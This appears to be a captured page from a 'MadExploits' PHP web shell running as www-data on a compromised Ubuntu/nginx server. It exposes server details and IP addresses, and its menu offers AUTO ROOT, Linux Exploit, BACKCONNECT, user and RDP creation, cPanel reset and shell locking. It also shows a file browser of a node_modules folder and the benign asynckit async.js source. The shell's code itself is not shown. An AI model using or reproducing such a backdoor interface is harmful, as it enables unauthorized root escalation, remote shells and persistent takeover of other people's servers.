Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
asynckit /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
abort.js
497
B
-rw-rw-rw-
async.js
599
B
-rw-rw-rw-
defer.js
441
B
-rw-rw-rw-
iterate.js
1.75
KB
-rw-rw-rw-
readable_asynckit.js
1.57
KB
-rw-rw-rw-
readable_parallel.js
673
B
-rw-rw-rw-
readable_serial.js
655
B
-rw-rw-rw-
readable_serial_ordered.js
941
B
-rw-rw-rw-
state.js
941
B
-rw-rw-rw-
streamify.js
2.89
KB
-rw-rw-rw-
terminator.js
533
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : async.js
var defer = require('./defer.js'); // API module.exports = async; /** * Runs provided callback asynchronously * even if callback itself is not * * @param {function} callback - callback to invoke * @returns {function} - augmented callback */ function async(callback) { var isAsync = false; // check if async happened defer(function() { isAsync = true; }); return function async_callback(err, result) { if (isAsync) { callback(err, result); } else { defer(function nextTick_callback() { callback(err, result); }); } }; }
Close